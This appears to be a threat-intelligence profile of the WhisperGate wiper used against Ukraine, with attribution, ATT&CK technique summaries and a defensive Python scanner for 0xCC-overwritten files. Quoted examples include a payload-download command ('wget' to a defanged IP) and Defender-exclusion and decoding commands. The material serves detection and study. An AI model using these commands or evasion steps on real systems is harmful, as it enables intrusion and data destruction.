WhisperGate
WhisperGate is destructive malware used in cyberattacks targeting organizations in Ukraine, publicly disclosed by Microsoft on 14 January 2022 and repeatedly referenced alongside other Russia-linked wipers used during the invasion period. The content associates WhisperGate with destructive operations against Ukraine and specifically notes reporting that GRU Unit 29155 activity included WhisperGate attacks targeting Ukraine; other cited reporting also states it was used in destructive operations attributed to Ember Bear.

WhisperGate is described as a multi-stage malware family with both disk- and file-destruction capabilities. It can overwrite the Master Boot Record with a malicious 16-bit bootloader, corrupt files by overwriting the first 1 MB with 0xCC and appending random extensions, and inject its fourth stage into a suspended process created by the legitimate Windows utility InstallUtil.exe. The malware also supports execution and defense evasion via PowerShell, can use a Visual Basic script to exclude the C:\ drive from Windows Defender, and can download and execute AdvancedRun.exe to disable the Windows Defender Threat Protection service and set an exclusion path for the C:\ drive. The content further states that WhisperGate can add directories to EDR exclusion lists to hide malicious files and can download additional payloads hosted on a Discord channel.

High-confidence behaviors and detection-relevant artifacts mentioned in the content include abuse of PowerShell, InstallUtil.exe process injection, Windows Defender exclusion changes for C:\, use of AdvancedRun.exe, Discord-hosted payload retrieval, MBR overwrite activity, and file corruption through 0xCC overwrites with random extensions.
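The 0xCC file-corruption artifact described above is something a responder can triage for directly. The following is an added example (not code from the page or from any vendor) that flags files whose first 1 MB, or whole body if smaller, is entirely 0xCC; the sample tree it builds, including the file names with made-up random extensions, is constructed for the demo.

```python
import tempfile
from pathlib import Path

OVERWRITE_LEN = 1024 * 1024  # the page states the first 1 MB of each file is overwritten
FILL_BYTE = b"\xCC"          # the overwrite pattern named on the page


def is_cc_overwritten(path: Path) -> bool:
    """True if the file's first 1 MB (or the entire file, if smaller) is all 0xCC.

    A file shorter than 1 MB is fully overwritten by the described behaviour, so
    the check length is the smaller of the file size and OVERWRITE_LEN.
    """
    size = path.stat().st_size
    if size == 0:
        return False  # an empty file carries no signal either way
    check_len = min(size, OVERWRITE_LEN)
    with path.open("rb") as fh:
        head = fh.read(check_len)
    return head == FILL_BYTE * check_len


def scan_tree(root: Path) -> list[Path]:
    """Walk a directory and return every file matching the 0xCC overwrite pattern."""
    hits = []
    for p in root.rglob("*"):
        if not p.is_file():
            continue
        try:
            if is_cc_overwritten(p):
                hits.append(p)
        except OSError:
            continue  # unreadable file: skip rather than abort the sweep
    return sorted(hits)


def build_sample_tree() -> Path:
    """Constructed sample data: two corrupted files, one clean file, one partial 0xCC run."""
    root = Path(tempfile.mkdtemp(prefix="whispergate_demo_"))
    # Hypothetical random extensions appended by the wiper; the real ones are not on the page.
    (root / "report.docx.k3lq").write_bytes(FILL_BYTE * 4096)                   # fully 0xCC
    (root / "big.bin.ab8z").write_bytes(FILL_BYTE * OVERWRITE_LEN + b"tail")    # 1 MB 0xCC + remainder
    (root / "clean.txt").write_bytes(b"hello world")                            # untouched
    (root / "partial.dat").write_bytes(FILL_BYTE * 512 + b"x")                  # not a full overwrite
    return root


if __name__ == "__main__":
    for hit in scan_tree(build_sample_tree()):
        print("possible 0xCC overwrite:", hit)
```

Legitimate files can be padded with 0xCC (for example alignment padding in some binaries), so treat a hit as a triage lead to correlate with the other artifacts listed above, not as proof on its own.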
Groups observed using it
5 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Beginning with WhisperGate, Microsoft continues to observe destructive malware attacks impacting organizations in Ukraine.
In 2022, the Russian APT used multiple wipers in attacks aimed at Ukraine, including AwfulShred, CaddyWiper, HermeticWiper, Industroyer2, IsaacWiper, WhisperGate, Prestige, RansomBoggs, and ZeroWipe.
...advisory detailed GRU’s Unit 29155 cyberespionage activities and WhisperGate attacks targeting Ukraine...
Unit 29155 ... has been carrying out destructive attacks, such as WhisperGate, which involved a wiper malware used against Ukraine in February 2022
Microsoft reported that it had found destructive malware, dubbed WhisperGate... CERT-UA published a report showing code similarity between WhisperKill (the file wiper used during the WhisperGate campaign) and WhiteBlackCrypt
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Execution
2 techniques
The content repeatedly describes threat actors and malware using PowerShell scripts/commands for execution, download, staging, reconnaissance, persistence, credential access, lateral movement, and defense evasion; e.g., "Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses."
During the 2016 Ukraine Electric Power Attack, Sandworm Team used the xp_cmdshell command in MS-SQL. During the 2025 Poland Wiper Attacks, the adversaries leveraged PsExec to run cmd.exe commands on multiple victim machines. Numerous malware families and groups are described as using cmd.exe, cmd /c, Windows command shell, or command-line interfaces to execute commands, payloads, reconnaissance, persistence, cleanup, and ransomware actions.
Stealth
4 techniques
The content repeatedly describes payloads, strings, configuration files, scripts, URLs, and binaries being obfuscated or encoded using Base64, XOR, RC4, AES, RSA, hex encoding, custom algorithms, and other methods across many malware families and threat actors.
Examples throughout the content include deleting tools, logs, malware-related files, staged archives, screenshots, temporary files, and exfiltrated data 'to cover their tracks,' 'reduce their footprint,' 'remove traces of activity,' or as part of 'post-intrusion cleanup.'
The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.
The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'
Defense Impairment
1 technique
Alternatively, they may add new directories to an EDR tool’s exclusion list, enabling them to hide malicious files via File/Path Exclusions.
Discovery
2 techniques
"4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands"
“3PARA RAT has a command to retrieve metadata for files on disk as well as a command to list the current working directory… admin@338 actors used… dir c:\ >> %temp%\download … APT28 has used Forfiles to locate PDF, Excel, and Word documents…”
Command and Control
2 techniques
The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.
Examples include: 'APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits,' 'APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads,' and many malware families used HTTP GET/POST or HTTPS to download additional payloads or files.
Impact
2 techniques
Following Russia’s invasion of Ukraine on 24 February 2022, likely Russian threat actors conducted several disruptive and destructive computer network attacks against Ukrainian targets... To date, there are eight tracked malware families that Russia-linked cyber threat actors have used for destructive activity against Ukraine: WhisperGate/Whisperkill, FoxBlade (HermeticWiper), SonicVote (HermeticRansom), CaddyWiper, DesertBlade, Industroyer2, Lasainraw (IsaacWiper) and FiberLake (DoubleZero).
"AcidPour includes functionality to reboot the victim system following wiping actions..."; "AcidRain reboots the target system once the various wiping processes are complete"; "Apostle reboots the victim machine following wiping"; "APT37 ... issue the command shutdown /r /t 1 to reboot a system after wiping its MBR"; "APT38 ... BOOTWRECK ... initiate a system reboot after wiping the victim's MBR"; "Black Basta ... used ShellExecuteA to shut down and restart"; "DarkGate ... used the shutdown command"; "HermeticWiper can initiate a system shutdown"; "NotPetya will reboot the system one hour after infection"; "Shamoon will reboot the infected system once the wiping functionality has been completed"; "WhisperGate can shutdown ... through ... ExitWindowsEx"
Other
3 techniques
"Play has used Base64-encoded PowerShell scripts to disable Microsoft Defender," "StrongPity can use PowerShell to add files to the Windows Defender exclusions list," and "ZeroCleare can use a malicious PowerShell script to bypass Windows controls."
Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities... killing security software processes or services, modifying / deleting Registry keys or configuration files... Adversaries may also disable updates...
BlackByte Ransomware 'adds .JS and .EXE extensions to the Microsoft Defender exclusion list'; PureCrypter 'executed Set-MpPreference -ExclusionPath'; QakBot 'modify the Registry to add its binaries to the Windows Defender exclusion list'; Raspberry Robin 'add an exception to Microsoft Defender that excludes the entire main drive'; StrongPity 'add directories used by the malware to the Windows Defender exclusions list'; XLoader 'can add the path of its executable to the Microsoft Defender exclusion list'; ZIPLINE 'can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool.'
Recent activity
75 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A destructive malware family referenced as an associated analytic story.
Destructive malware/wiper referenced in the analytic story list and supporting Microsoft reference about destructive malware targeting Ukrainian organizations.
Destructive malware referenced in relation to Windows Defender exclusion behavior and defense evasion.
Destructive malware/wiper referenced as related to Windows Defender evasion behavior.